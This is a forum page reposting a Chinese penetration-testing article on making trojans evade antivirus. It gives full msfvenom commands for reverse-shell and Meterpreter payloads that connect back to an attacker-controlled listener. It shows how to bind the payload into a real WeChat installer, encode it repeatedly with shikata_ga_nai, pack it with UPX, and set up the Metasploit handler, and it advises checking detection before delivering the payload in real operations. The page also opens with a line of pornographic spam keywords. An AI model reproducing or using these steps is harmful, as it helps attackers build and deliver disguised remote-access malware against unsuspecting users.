chinese直男口爆体育生外卖, 99久久er热在这里只有精品99, 又色又爽又黄18禁美女裸身无遮挡, gogogo高清免费观看日本电视,私密按摩师高清版在线,人妻视频毛茸茸,91论坛 兴趣闲谈,欧美 亚洲 精品 8区,国产精品久久久久精品免费

0
  • 聊天消息
  • 系統(tǒng)消息
  • 評(píng)論與回復(fù)
登錄后你可以
  • 下載海量資料
  • 學(xué)習(xí)在線課程
  • 觀看技術(shù)視頻
  • 寫文章/發(fā)帖/加入社區(qū)
會(huì)員中心
創(chuàng)作中心

完善資料讓更多小伙伴認(rèn)識(shí)你,還能領(lǐng)取20積分哦,立即完善>

3天內(nèi)不再提示

免殺技術(shù)與殺軟技術(shù)的區(qū)別

馬哥Linux運(yùn)維 ? 來源:FreeBuf ? 作者:FreeBuf ? 2022-07-08 10:49 ? 次閱讀
加入交流群
微信小助手二維碼

掃碼添加小助手

加入工程師交流群

免殺,又叫免殺毒技術(shù),是反病毒,反間諜的對(duì)立面,是一種能使病毒或木馬免于被殺毒軟件查殺的軟件。它除了使病毒木馬免于被查殺外,還可以擴(kuò)增病毒木馬的功能,改變病毒木馬的行為。免殺的基本特征是破壞特征,有可能是行為特征,只要破壞了病毒與木馬所固有的特征,并保證其原有功能沒有改變,一次免殺就能完成了。免殺技術(shù)也并不是十惡不赦的,例如,在軟件保護(hù)所用的加密產(chǎn)品(比如殼)中,有一些會(huì)被殺毒軟件認(rèn)為是木馬病毒;一些安全領(lǐng)域中的部分安全檢測(cè)產(chǎn)品,也會(huì)被殺毒軟件誤殺,這時(shí)就需要免殺技術(shù)來應(yīng)對(duì)這些不穩(wěn)定因素。

1、裸奔馬的嘗試

意為不做任何免殺處理的木馬

1、使用msf的msfvenom生成木馬文件,生成一個(gè)裸奔馬,命名為 weixin.exe吧

命令:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.132 LPORT=8888 -f exe 》 weixin.exe

abf372ee-fdf9-11ec-ba43-dac502259ad0.jpg

2、部署一下kali上的apache服務(wù),令目標(biāo)機(jī)器能夠訪問下載我們生成的木馬

2.1、kali中是自帶有apache的,啟動(dòng)apache服務(wù)

ac0b1098-fdf9-11ec-ba43-dac502259ad0.jpg

2.2、把生成的weixin.exe文件放在/var/www/html文件夾下

ac23dd8a-fdf9-11ec-ba43-dac502259ad0.jpg

2.3、在靶機(jī)下訪問192.168.111.132/weinxin.exe,已經(jīng)下載

ac3774c6-fdf9-11ec-ba43-dac502259ad0.jpg

2.4、發(fā)現(xiàn)被AV查殺

ac4d0750-fdf9-11ec-ba43-dac502259ad0.jpg

ac5d624e-fdf9-11ec-ba43-dac502259ad0.jpg

如果在實(shí)戰(zhàn)中,直接投遞裸奔馬比較容易引起對(duì)方運(yùn)維人員的警覺,這種方式也比較冒險(xiǎn),所以在投遞之前,要測(cè)試制作的木馬是否會(huì)引起相關(guān)AV的查殺,比如在在線多引擎病毒識(shí)別工具中去測(cè)試

2.5、這里po一個(gè)在線殺毒查殺的網(wǎng)站,virustotal是一個(gè)提供免費(fèi)的可疑文件分析服務(wù)的網(wǎng)站,它與傳統(tǒng)殺毒軟件的不同之處是它通過多種反病毒引擎掃描文件。使用多種反病毒引擎對(duì)您所上傳的文件進(jìn)行檢測(cè), 以判斷文件是否被病毒, 蠕蟲, 木馬, 以及各類惡意軟件感染。

ac70f1a6-fdf9-11ec-ba43-dac502259ad0.jpg

2、MSF編碼

在metasploit框架下免殺的方式之一是msf編碼器,功能是使用msf編碼器對(duì)我們制作的木馬進(jìn)行重新編碼,生成一個(gè)二進(jìn)制文件,這個(gè)文件運(yùn)行后,msf編碼器會(huì)將原始程序解碼到內(nèi)存中并執(zhí)行。

1、在kali終端輸入 msfvenom -l encoders,這可以列出所有可用的編碼格式

ac8cc3e0-fdf9-11ec-ba43-dac502259ad0.jpg

2、在msf的/data/templates/下有很多metasploit自帶的用于捆綁木馬的程序模板,這個(gè)模塊但是一些反病毒廠商關(guān)注的重點(diǎn),為了更好的實(shí)現(xiàn)免殺,我們需要自主選擇一個(gè)待捆綁程序。在這里選擇是真正的微信安裝包。(也有對(duì)裸奔馬進(jìn)行shikata_ga_nai編碼饒AV的方法,但是shikata_ga_nai編碼技術(shù)多態(tài),每次生成的攻擊載荷文件都不一樣,有時(shí)生成的文件會(huì)被查殺,有時(shí)不會(huì),所以結(jié)合以上思路,生成一個(gè)捆綁木馬,并進(jìn)行shikata_ga_nai編碼)

aca4ddc2-fdf9-11ec-ba43-dac502259ad0.jpg

把微信安裝包放在/root文件夾下

acbae414-fdf9-11ec-ba43-dac502259ad0.jpg

3、使用msfvenom生成一個(gè)Windows環(huán)境下的木馬,并捆綁到WeChatSetup.exe上生成WeChatSetup1.exe的合成馬,同時(shí)對(duì)木馬進(jìn)行x86/shikata_ga_nai進(jìn)行多次編碼的方式進(jìn)行免殺處理。

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.111.132 LPORT=9999 -e x86/shikata_ga_nai -x WeChatSetup.exe -i 12 -f exe -o /root/WeChatSetup1.exe

acd4c0dc-fdf9-11ec-ba43-dac502259ad0.jpg

參數(shù)說明:

-e /指定編碼方式對(duì)攻擊載荷進(jìn)行重新編碼

-x /指定木馬捆綁在哪個(gè)可執(zhí)行程序模板上

-i /指定對(duì)目標(biāo)進(jìn)行編碼的次數(shù),多次編碼理論上有助于免殺的實(shí)現(xiàn)

-f /指定msf編碼器輸出程序的格式

-0 /指定處理完畢后的文件輸出路徑

4、把生成的文件放在kali中的apache服務(wù)對(duì)應(yīng)的文件夾下,令攻擊機(jī)訪問

aceb1e7c-fdf9-11ec-ba43-dac502259ad0.jpg

5、攻擊機(jī)下載后,在msf上創(chuàng)建監(jiān)聽

use exploit/multi/handler

set payload windows/shell/reverse_tcp ///選擇payload為Windows/shell/reverse_tcp

show options ///查看一下哪些選項(xiàng)需要配置

set lhost 192.168.111.132 ///設(shè)置一下主機(jī)地址

set lport 9999 ///設(shè)置下主機(jī)端口,為木馬設(shè)定的端口

run

ad0360e0-fdf9-11ec-ba43-dac502259ad0.jpg

6、在目標(biāo)機(jī)器上點(diǎn)擊偽造的安裝包,沒有打開,因?yàn)槔壞抉R并多次編碼后,安裝包源文件已經(jīng)損壞,但是在攻擊機(jī)的,目標(biāo)機(jī)器已經(jīng)上線

ad16150a-fdf9-11ec-ba43-dac502259ad0.jpg

3、UPX加殼

upx打包器有兩種功能,一種叫做給程序加殼,一種叫壓縮程序,在這里使用打包器的目的是改變后門程序的特征碼。

壓縮的時(shí)候:它首先可執(zhí)行文件中的可執(zhí)行數(shù)據(jù)解壓出來,然后將解壓縮用的代碼附加在前面

運(yùn)行的時(shí)候:將原本的可執(zhí)行數(shù)據(jù)解壓出來,然后再運(yùn)行解壓縮后的數(shù)據(jù)

1、在kali中內(nèi)置了upx打包器,輸入upx可以看下參數(shù)介紹

ad3097ea-fdf9-11ec-ba43-dac502259ad0.jpg

2、簡單的命令就是直接upx file,對(duì)file文件進(jìn)行加殼處理,加殼后,因?yàn)榻?jīng)過壓縮,文件大小會(huì)變小

ad5161e6-fdf9-11ec-ba43-dac502259ad0.jpg

3、還是老樣子,把上面經(jīng)歷過編碼后,又加殼的weixin安裝包放在apache服務(wù)的文件夾下,供目標(biāo)機(jī)器讀取下載(如上2.4)

ad6f17cc-fdf9-11ec-ba43-dac502259ad0.jpg

4、在msf上可以創(chuàng)建正常的連接和監(jiān)聽,成功傳回

ad9fade2-fdf9-11ec-ba43-dac502259ad0.jpg

后言

免殺技術(shù)也被安全技術(shù)廠商盯上并開發(fā)相對(duì)應(yīng)的檢測(cè)技術(shù),所以免殺技術(shù)與殺軟技術(shù)是互相促進(jìn)發(fā)展的,而且發(fā)展速度很快,有些現(xiàn)在可以測(cè)試成功的殺軟技術(shù),過段時(shí)間就不能用了。免殺技術(shù)還需要狠下功夫去研究,接下來也會(huì)嘗試python,GO寫的免殺,也會(huì)在后續(xù)文章中敘述進(jìn)展!

原文標(biāo)題:滲透測(cè)試-木馬免殺的幾種方式

文章出處:【微信公眾號(hào):馬哥Linux運(yùn)維】歡迎添加關(guān)注!文章轉(zhuǎn)載請(qǐng)注明出處。

審核編輯:彭靜
聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點(diǎn)僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場(chǎng)。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問題,請(qǐng)聯(lián)系本站處理。 舉報(bào)投訴
  • 軟件
    +關(guān)注

    關(guān)注

    69

    文章

    5154

    瀏覽量

    89231
  • 木馬
    +關(guān)注

    關(guān)注

    0

    文章

    47

    瀏覽量

    13543
  • python
    +關(guān)注

    關(guān)注

    56

    文章

    4827

    瀏覽量

    86777
收藏 人收藏
加入交流群
微信小助手二維碼

掃碼添加小助手

加入工程師交流群

    評(píng)論

    相關(guān)推薦
    熱點(diǎn)推薦

    顛覆智造:profinet轉(zhuǎn)ethernet ip網(wǎng)關(guān)×發(fā)那科×西門子的三國

    顛覆智造: profinet轉(zhuǎn)ethernet ip網(wǎng)關(guān)x 發(fā)那科×西門子的“三國”如何引爆汽車產(chǎn)線效能革命? 行業(yè)案例:汽車零部件柔性搬運(yùn)系統(tǒng)集成應(yīng)用 某汽車零部件工廠需升級(jí)生產(chǎn)線,實(shí)現(xiàn)不同型
    的頭像 發(fā)表于 06-16 19:57 ?157次閱讀
    顛覆智造:profinet轉(zhuǎn)ethernet ip網(wǎng)關(guān)×發(fā)那科×西門子的三國<b class='flag-5'>殺</b>

    藍(lán)牙5.4與藍(lán)牙6.0的核心區(qū)別技術(shù)特性對(duì)比

    藍(lán)牙5.4與藍(lán)牙6.0的核心區(qū)別技術(shù)特性對(duì)比
    的頭像 發(fā)表于 04-02 15:55 ?1.7w次閱讀
    藍(lán)牙5.4與藍(lán)牙6.0的核心<b class='flag-5'>區(qū)別</b>及<b class='flag-5'>技術(shù)</b>特性對(duì)比

    MPLS和SR傳輸技術(shù)區(qū)別

    當(dāng)你在游戲里“五”時(shí)卡頓,當(dāng)你在視頻會(huì)議中突然掉線,這些抓狂瞬間的背后,大多是數(shù)據(jù)傳輸丟包或者延遲造成的。而如何保證不丟包、低延遲,MPLS(Multiprotocol Label
    的頭像 發(fā)表于 03-28 10:15 ?459次閱讀
    MPLS和SR傳輸<b class='flag-5'>技術(shù)</b>的<b class='flag-5'>區(qū)別</b>

    ArcMuse計(jì)算技術(shù)引擎全面升級(jí)

    經(jīng)過半年多的潛心研發(fā)和技術(shù)攻關(guān),虹ArcMuse計(jì)算技術(shù)引擎迎來全面升級(jí),實(shí)現(xiàn)多項(xiàng)關(guān)鍵技術(shù)突破。升級(jí)內(nèi)容涵蓋高清視頻生成、AI模特圖高精度生成、智能試衣和平鋪圖生成等領(lǐng)域,有效攻克了
    的頭像 發(fā)表于 12-11 17:34 ?801次閱讀

    連續(xù)拿下多項(xiàng)海外大獎(jiǎng),海信激光顯示技術(shù)瘋了

    2024年,海信激光顯示產(chǎn)品憑借出色的技術(shù)創(chuàng)新和市場(chǎng)表現(xiàn),連續(xù)榮獲PC Mag Editors' Choice、Tech Radar??Recommends和Projector Reviews
    的頭像 發(fā)表于 12-09 13:54 ?874次閱讀

    錯(cuò)誤防護(hù)技術(shù)在車規(guī)MCU中應(yīng)用

    ,遠(yuǎn)大于車規(guī)芯片要求,ASIL-D等級(jí)車規(guī)MCU要求小于10 FIT,為了滿足ISO26262要求,需要解決錯(cuò)誤問題。對(duì)于錯(cuò)誤汽車MCU問題進(jìn)行研究和探索,采用新技術(shù)解決錯(cuò)誤等車
    發(fā)表于 12-06 16:39

    使用獨(dú)立ADC和使用MCU的內(nèi)部ADC來實(shí)現(xiàn)模數(shù)轉(zhuǎn)換,有什么性能、技術(shù)上的區(qū)別嗎?

    使用獨(dú)立ADC和使用MCU的內(nèi)部ADC來實(shí)現(xiàn)模數(shù)轉(zhuǎn)換,有什么性能、技術(shù)上的區(qū)別嗎? 二者有沒有各自的優(yōu)劣勢(shì)?
    發(fā)表于 11-22 06:10

    一文掌握UV LED在空凈消領(lǐng)域的主要應(yīng)用

    近年來,隨著科技的日新月異,LED領(lǐng)域也發(fā)展迅速。作為一種新型LED,UV LED憑借其眾多優(yōu)秀特性而備受矚目。本文將介紹UV LED的主要性能、背后原理以及在空凈消相關(guān)領(lǐng)域的應(yīng)用。 ? 一、走進(jìn)
    發(fā)表于 10-23 14:02 ?1431次閱讀
    一文掌握UV LED在空凈消<b class='flag-5'>殺</b>領(lǐng)域的主要應(yīng)用

    激光釬焊技術(shù):SMT領(lǐng)域內(nèi)的現(xiàn)狀與未來發(fā)展趨勢(shì)(下)

    激光釬焊技術(shù)正成為SMT領(lǐng)域的一項(xiàng)關(guān)鍵技術(shù),它通過使用激光作為熱源,實(shí)現(xiàn)了對(duì)電子元件的精密焊接。這項(xiàng)技術(shù)以其非接觸式加熱、熱影響區(qū)小、快速加熱與冷卻等優(yōu)勢(shì),特別適合于微小空間和復(fù)雜立
    的頭像 發(fā)表于 09-30 10:49 ?728次閱讀
    激光<b class='flag-5'>軟</b>釬焊<b class='flag-5'>技術(shù)</b>:SMT領(lǐng)域內(nèi)的現(xiàn)狀與未來發(fā)展趨勢(shì)(下)

    激光釬焊技術(shù):SMT領(lǐng)域內(nèi)的現(xiàn)狀與未來發(fā)展趨勢(shì)(上)

    激光釬焊技術(shù)正成為SMT領(lǐng)域的一項(xiàng)關(guān)鍵技術(shù),它通過使用激光作為熱源,實(shí)現(xiàn)了對(duì)電子元件的精密焊接。這項(xiàng)技術(shù)以其非接觸式加熱、熱影響區(qū)小、快速加熱與冷卻等優(yōu)勢(shì),特別適合于微小空間和復(fù)雜立
    的頭像 發(fā)表于 09-29 13:57 ?878次閱讀
    激光<b class='flag-5'>軟</b>釬焊<b class='flag-5'>技術(shù)</b>:SMT領(lǐng)域內(nèi)的現(xiàn)狀與未來發(fā)展趨勢(shì)(上)

    精密電子焊接挑戰(zhàn):激光釬焊技術(shù)的優(yōu)勢(shì)與應(yīng)用

    隨著電子工業(yè)的快速發(fā)展,產(chǎn)品趨向微型化、復(fù)雜化和集成化,對(duì)焊接技術(shù)提出了更高的要求。激光釬焊技術(shù)以其非接觸式加熱、局部加熱、自動(dòng)化潛力大、焊接質(zhì)量高和可靠性強(qiáng)等優(yōu)勢(shì),成為解決精密焊接難題的關(guān)鍵
    的頭像 發(fā)表于 09-26 16:47 ?1051次閱讀
    精密電子焊接挑戰(zhàn):激光<b class='flag-5'>軟</b>釬焊<b class='flag-5'>技術(shù)</b>的優(yōu)勢(shì)與應(yīng)用

    通動(dòng)力數(shù)字孿生技術(shù)推動(dòng)海洋產(chǎn)業(yè)變革

    近日,河北省科技計(jì)劃項(xiàng)目綜合服務(wù)平臺(tái)公布了河北省2024年度科技研發(fā)平臺(tái)專項(xiàng)項(xiàng)目,通動(dòng)力成功參與京津冀國家技術(shù)創(chuàng)新中心河北中心牽頭的重大科研項(xiàng)目——《海洋牧場(chǎng)數(shù)字孿生系統(tǒng)研究開發(fā)與應(yīng)用示范》。這一
    的頭像 發(fā)表于 09-25 16:59 ?995次閱讀

    PDMS刻蝕技術(shù)的應(yīng)用

    PDMS(聚二甲基硅氧烷)刻蝕技術(shù)是一種在高分子科學(xué)中廣泛應(yīng)用的微制造技術(shù)。它能夠簡捷有效、高精度地制備出眾多材料的微結(jié)構(gòu),且技術(shù)成本低廉,不需要昂貴的設(shè)備和苛刻的環(huán)境,具有極好的應(yīng)
    的頭像 發(fā)表于 09-19 14:38 ?2046次閱讀

    微流控芯片加工中的PDMS刻蝕技術(shù)和聚合物成型介紹

    微流控芯片大致可以分為三種類型:PDMS芯片、聚合物芯片(COC、PMMA、PC等)和玻璃芯片。三種不同類型的芯片各有不同的加工方法。本文主要介紹PDMS芯片加工的光刻/刻蝕技術(shù)(soft
    的頭像 發(fā)表于 08-28 14:42 ?1542次閱讀
    微流控芯片加工中的PDMS<b class='flag-5'>軟</b>刻蝕<b class='flag-5'>技術(shù)</b>和聚合物成型介紹

    開關(guān)技術(shù)的原理和分類

    開關(guān)技術(shù),作為一種先進(jìn)的電力電子技術(shù),在近年來得到了廣泛的關(guān)注和應(yīng)用。該技術(shù)通過優(yōu)化開關(guān)元件的開關(guān)過程,實(shí)現(xiàn)了降低開關(guān)損耗、提高系統(tǒng)效率、減少電磁干擾(EMI)等多重優(yōu)勢(shì)。以下將詳細(xì)
    的頭像 發(fā)表于 08-14 17:23 ?5054次閱讀